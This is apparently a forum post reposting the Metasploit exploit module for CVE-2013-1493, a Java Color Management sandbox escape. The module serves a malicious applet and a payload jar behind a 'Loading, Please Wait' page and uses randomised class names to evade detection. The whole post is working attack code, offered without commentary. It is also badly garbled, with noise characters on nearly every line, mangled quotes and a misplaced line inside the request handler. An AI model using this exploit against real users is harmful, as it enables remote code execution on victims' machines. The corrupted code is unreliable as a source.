##8 J. [0 t/ F& ]; Y
" k/ E$ ^* y4 ^2 N ^5 D4 y6 @
# This file is part of the Metasploit Framework and may be subject to
" K/ v( u) s2 F# redistribution and commercial restrictions. Please see the Metasploit
% N: L: W% k2 |; _2 j; }# web site for more information on licensing and terms of use.. F" U& W9 `* c4 ^( p! z! i7 M
# http://metasploit.com/4 I0 ?: [2 e' y6 j$ w
##
7 [/ b' s# G& N: L' P5 Frequire ‘msf/core’
* X7 R; b- T2 {require ‘rex’! l, @* A- l: a* U
class Metasploit3 < Msf::Exploit::Remote
1 A0 d9 q' u7 C* T8 y! g* ]* ZRank = NormalRanking
* ]0 P! G6 Y7 kinclude Msf::Exploit::Remote::HttpServer::HTML/ O. |# P1 i4 n. e- Z, e
include Msf::Exploit::EXE
( M t" j1 A( [% oinclude Msf::Exploit::Remote::BrowserAutopwn
3 F: Q% [2 W2 F" ?' X' ~6 vautopwn_info({ :javascript => false })+ b/ M* p( x3 b# F5 E9 k
def initialize( info = {} )
; r3 x0 X0 ~. W$ Z( Msuper( update_info( info,( Z& E+ {# Y0 _ }$ I( d7 ~
‘Name’ => ‘Java CMM Remote Code Execution’,
& U- c7 a/ A+ ~4 L( c$ b‘Description’ => %q{3 ] W# ?5 j8 G3 h$ P$ k
This module abuses the Color Management classes from a Java Applet to run
7 F& ], d4 r* t# [; R5 C3 e$ Iarbitrary Java code outside of the sandbox as exploited in the wild in February
0 B5 a& p4 ]" G, mand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; O8 l) O; A4 land earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" A& d/ t# J: o9 p/ Vsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
8 G s9 g) \+ O' Jwarning in order to run the malicious applet.
4 j, L) L& U4 o, F& W: G& g" d- M},6 B% X2 J+ R: l/ T7 B
‘License’ => MSF_LICENSE,
+ Q' j, c3 Q H- g8 B4 F‘Author’ =>
$ c8 [) S9 e" X" K0 B'Unknown', # Vulnerability discovery and Exploit
; C) g1 r; \* @$ T, F'juan vazquez' # Metasploit module (just ported the published exploit)
+ i8 d4 e) j- |+ k& E],
* q' ~, L% S+ |0 @) \7 r‘References’ =>* `2 O+ M; h2 m: R
[
/ Q8 I9 Y, Z1 X! X2 d) @[ 'CVE', '2013-1493' ],; j8 m9 L0 J- E p# k" r" L. s
[ 'OSVDB', '90737' ],* ?" v6 u% t9 C. m I
[ 'BID', '58238' ],0 T2 W- v6 O1 H+ \# A
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
, W" W: q) Z5 A$ P8 y. v[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
% ~: j+ k1 t2 C' ^! _[ 'URL', 'http://pastie.org/pastes/6581034' ]: _6 U, }/ U$ z. G8 q; R
],
" x% n" h! ~1 ^8 l‘Platform’ => [ 'win', 'java' ],
- A$ {% ~' x* W1 }& E. s‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true }, Y3 I! f( c& I @( ?4 k
‘Targets’ =>
* s) w( O- d! t& C. i# j[7 r/ r `% }$ E- q
[ 'Generic (Java Payload)',& M; W9 Z0 s! o+ d! I& a
{/ K }5 h% p5 ]$ N$ e3 [$ v
'Platform' => 'java',
7 Y$ {8 O2 u, A" r'Arch' => ARCH_JAVA
# j: O5 x! R6 f2 X0 v; L}, @& `% B, }! J
],+ t' D& W* ^7 z5 @' y3 z9 C3 |" E
[ 'Windows x86 (Native Payload)',
+ T& P) {$ p: e( z{9 [9 S, g5 n7 A0 ]- y, h: g# \
'Platform' => 'win',
+ B5 Z, y3 F. g5 L+ C'Arch' => ARCH_X867 A1 c1 q# ?# _# ]0 }+ m! m5 X. U$ T
}; o3 S. i0 J. ^
]) E# F2 V$ X" M1 Y
],+ ^# ?6 N f! l0 W
‘‘DisclosureDate’ => ‘Mar 01 2013′
' N. ^/ u6 @* s/ l) y))
+ l' W+ C7 l; S; X; mend& ^1 C' b6 W. t7 F! M) q2 X D9 T
def setup1 |8 L1 I& M& _3 }6 ` M5 L
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)- \+ W9 u: J) y
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ R4 E$ z" ] H% Y @! S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)* D Z$ J9 Q2 _2 I& J
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. l I% g8 e# J7 h" C+ P1 o
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
2 n3 R# q3 r1 D: N@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( Z$ P4 I1 E/ [& i( `# h: \9 Epath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”); H1 n4 [! a( h' N' |; d
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
R1 L* g" i* V* _+ n@init_class_name = rand_text_alpha(“Init”.length)! l: m( i1 L3 }6 ]% W9 _" h
@init_class.gsub!(“Init”, @init_class_name)
1 x3 `2 `4 g( Z5 H0 \super4 r0 C! z% p" d7 V+ x
end
7 f" }: @/ k! sdef on_request_uri(cli, request)3 g' ]1 `* V) p5 Z% w8 V* {& _. m
print_status(“handling request for #{request.uri}”)
2 e+ ]1 T/ }. a) s. Kcase request.uri
3 }" e, l/ n. v/ zwhen /\.jar$/i, t# C9 F. x) t
jar = payload.encoded_jar2 I: v$ t: U" {8 X. ]5 l
jar.add_file(“#{@init_class_name}.class”, @init_class)+ v% D* A# | J1 Q% a; h
jar.add_file(“Leak.class”, @leak_class)$ R$ P- F, Q: G- [6 w' v A+ I
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)0 U0 {6 q/ u# i% j+ w2 F/ x. C7 Y
jar.add_file(“MyColorSpace.class”, @color_space_class)6 H1 g5 L6 E. y( A
DefaultTarget’ => 1,5 i' Z7 C, A+ P) N3 \
metasploit_str = rand_text_alpha(“metasploit”.length)1 m6 W. ~0 ~# {6 s6 y
payload_str = rand_text_alpha(“payload”.length)' \6 d5 D8 ?5 u) \* P
jar.entries.each { |entry|7 l9 d' w+ U& ^1 m7 q4 \; B
entry.name.gsub!(“metasploit”, metasploit_str)! x* L+ X( c+ g O3 [2 v% z, Z v
entry.name.gsub!(“Payload”, payload_str)
5 i: ]9 y8 ?/ t- M& e' qentry.data = entry.data.gsub(“metasploit”, metasploit_str)
5 q5 w+ D+ X% j) C- U% w1 G: Pentry.data = entry.data.gsub(“Payload”, payload_str)0 J: b! Y1 D& w& o
}
' R$ N" |/ K1 I5 G* S' L9 M7 _jar.build_manifest' |; t- r. j1 `$ p# d
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
8 \# W# L! z5 t- U3 s. {$ fwhen /\/$/
# W% y. q1 X; {payload = regenerate_payload(cli) E! X/ N3 ]& z9 N7 I7 _+ W9 T: H
if not payload: L7 H: i$ [& ~; C1 E5 S2 w
print_error(“Failed to generate the payload.”)
( P: t0 h1 p+ C/ i( ksend_not_found(cli)$ ?, b- Y o- G3 }. c. U
return
& O+ I( ]. v: P$ H! [! kend7 B/ m# Y4 u/ l* H4 [! P7 Q
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
6 [) q/ F7 D/ S& w. x- Ielse; W: A7 @; T1 N0 F7 m. W/ d7 j
send_redirect(cli, get_resource() + ‘/’, ”)7 s& Q$ R. `8 c9 K
end8 c! G3 I2 c, X
end
# o+ C/ U; B+ E4 h( z1 Sdef generate_html% Q" C2 G) K- ]
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|7 j L( b8 T5 O0 R" W' k" W
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
8 M% P4 I4 Y! p: v. F! {7 Q3 m7 _$ Mhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|: L" k9 {: G6 r
html += %Q|</applet></body></html>|6 }5 M0 Y9 k! ~. v/ f0 n5 y8 N
return html
" d4 X+ o0 r6 I& d# \! Q" L- Wend' Q$ T# L* p. d7 g; r( h; l
end% V- Q6 F, c7 v7 |( v4 W$ t
end
S' Y% w8 R) W0 Z. g0 N |
发表于 2013-4-4 17:31:17
收藏
支持
反对